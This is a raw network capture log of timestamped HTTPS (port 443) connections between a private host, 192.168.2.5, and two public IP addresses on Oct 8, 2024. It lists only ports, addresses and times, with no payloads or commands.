Oct 8, 2024 03:32:33.779504061 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.779534101 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:33.780550003 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:33.780633926 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.783365011 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:33.823407888 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:34.090471029 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:34.090573072 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:34.090610027 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:34.090770006 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:34.090770006 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:34.090872049 CEST	443	49828	216.58.206.46	192.168.2.5
Oct 8, 2024 03:32:34.090936899 CEST	49828	443	192.168.2.5	216.58.206.46
Oct 8, 2024 03:32:34.113904953 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.113976002 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:34.114049911 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.114212036 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.114244938 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:34.770392895 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:34.770570040 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.775285006 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.775310040 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:34.775726080 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:34.775789022 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.783994913 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:34.827418089 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.545006037 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.545100927 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.550546885 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.550688982 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.562680006 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.562763929 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.562793016 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.562849045 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.563139915 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.563474894 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.568825006 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.568912983 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.633224964 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.633435965 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.633456945 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.633518934 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.633533955 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.633588076 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.634258986 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.634316921 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.634331942 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.634382963 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.640394926 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.640461922 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.640500069 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.640609026 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.648962975 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.649023056 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.649038076 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.649097919 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.652641058 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.652704954 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.652817965 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.652875900 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.658545017 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.658603907 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.658715010 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.658771038 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.664843082 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.664901972 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.665019035 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.665075064 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.671166897 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.671225071 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.671359062 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.671432972 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.676980019 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.677037954 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.677174091 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.677278996 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.682864904 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.682934046 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.683067083 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.683125973 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.688498974 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.688556910 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.688699961 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.688839912 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.694817066 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.694884062 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.699035883 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.699106932 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.700694084 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.700934887 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.721357107 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.721424103 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.721689939 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.721765995 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.722177982 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.722230911 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.722256899 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.722310066 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.722764969 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.722820044 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.723434925 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.723488092 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.723507881 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.723790884 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.725402117 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.725461960 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.725660086 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.725779057 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.725790977 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.725850105 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.731080055 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.731143951 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.731162071 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.731215000 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.736512899 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.736586094 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.736676931 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.736741066 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.741509914 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.741601944 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.741744995 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.741800070 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.748311996 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.748402119 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.748511076 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.748668909 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.751199007 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.751264095 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.751429081 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.751487970 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.755893946 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.755950928 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.756083965 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.756139040 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.761141062 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.761288881 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.761300087 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.761357069 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.765635967 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.765706062 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.765717030 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.765938044 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.769956112 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.770035982 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.770111084 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.770190001 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.774787903 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.774919987 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.774959087 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.775053024 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.779119015 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.779186010 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.779218912 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.779284000 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.783448935 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.783639908 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.783703089 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.783718109 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.785063982 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.787522078 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.789082050 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.789093018 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.789149046 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.791692972 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.791753054 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.791773081 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.791829109 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.795270920 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.795330048 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.795356035 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.795428038 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.798965931 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.799027920 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.799050093 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.799125910 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.802625895 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.802910089 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.802921057 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.802975893 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.814709902 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.814788103 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.814799070 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.814862013 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.814913034 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.814968109 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.815329075 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.815399885 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.815737009 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.815790892 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.815896034 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.815948963 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.816333055 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.816385031 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.816988945 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.817047119 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.817579985 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.817635059 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.817874908 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.817929029 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.819960117 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.820014954 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.820323944 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.820378065 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.821851015 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.821906090 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.822120905 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.822182894 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.824255943 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.824316025 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.824429035 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.824482918 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.826138973 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.826261997 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.826338053 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.826517105 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.828288078 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.828345060 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.828466892 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.828520060 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.830549955 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.830607891 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.830828905 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.830887079 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.832637072 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.832695007 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.832856894 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.832911015 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.835275888 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.835334063 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.835345984 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.835424900 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.837264061 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.837335110 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.837418079 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.837472916 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.839169979 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.839229107 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.839350939 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.839420080 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.841226101 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.841284990 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.841439962 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.841495991 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.843538046 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.843594074 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.843970060 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.844031096 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.845577002 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.847683907 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.847781897 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.847794056 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.847846985 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.847960949 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.848018885 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.850125074 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.850182056 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.850409031 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.850465059 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.851835966 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.851891994 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.852044106 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.852098942 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.853910923 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.853971004 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.854228020 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.854280949 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.856081963 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.856137991 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.856354952 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.856405973 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.858599901 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.858675957 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.858817101 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.858870983 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.860088110 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.860143900 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.860305071 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.860357046 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.862131119 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.862183094 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.862880945 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.862936020 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.864037991 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.864094973 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.864309072 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.864366055 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.866240025 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.866348982 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.867480040 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.867537975 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.868114948 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.868170023 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.868383884 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.868442059 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.870065928 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.870136976 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.871565104 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.871622086 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.871645927 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.871701002 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.871849060 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.871902943 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.872030973 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.872085094 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.873981953 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.874044895 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.875792980 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.875853062 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.875943899 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.876137972 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.876435041 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.876490116 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.877639055 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.877695084 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.879772902 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.879832983 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.879919052 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.879976034 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.880172014 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.880243063 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.881499052 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.883589983 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.883655071 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.883666039 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.884336948 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.884347916 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.884403944 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.885241032 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.885298014 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.887098074 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.887157917 CEST	49838	443	192.168.2.5	216.58.206.65
Oct 8, 2024 03:32:37.887322903 CEST	443	49838	216.58.206.65	192.168.2.5
Oct 8, 2024 03:32:37.887378931 CEST	49838	443	192.168.2.5	216.58.206.65
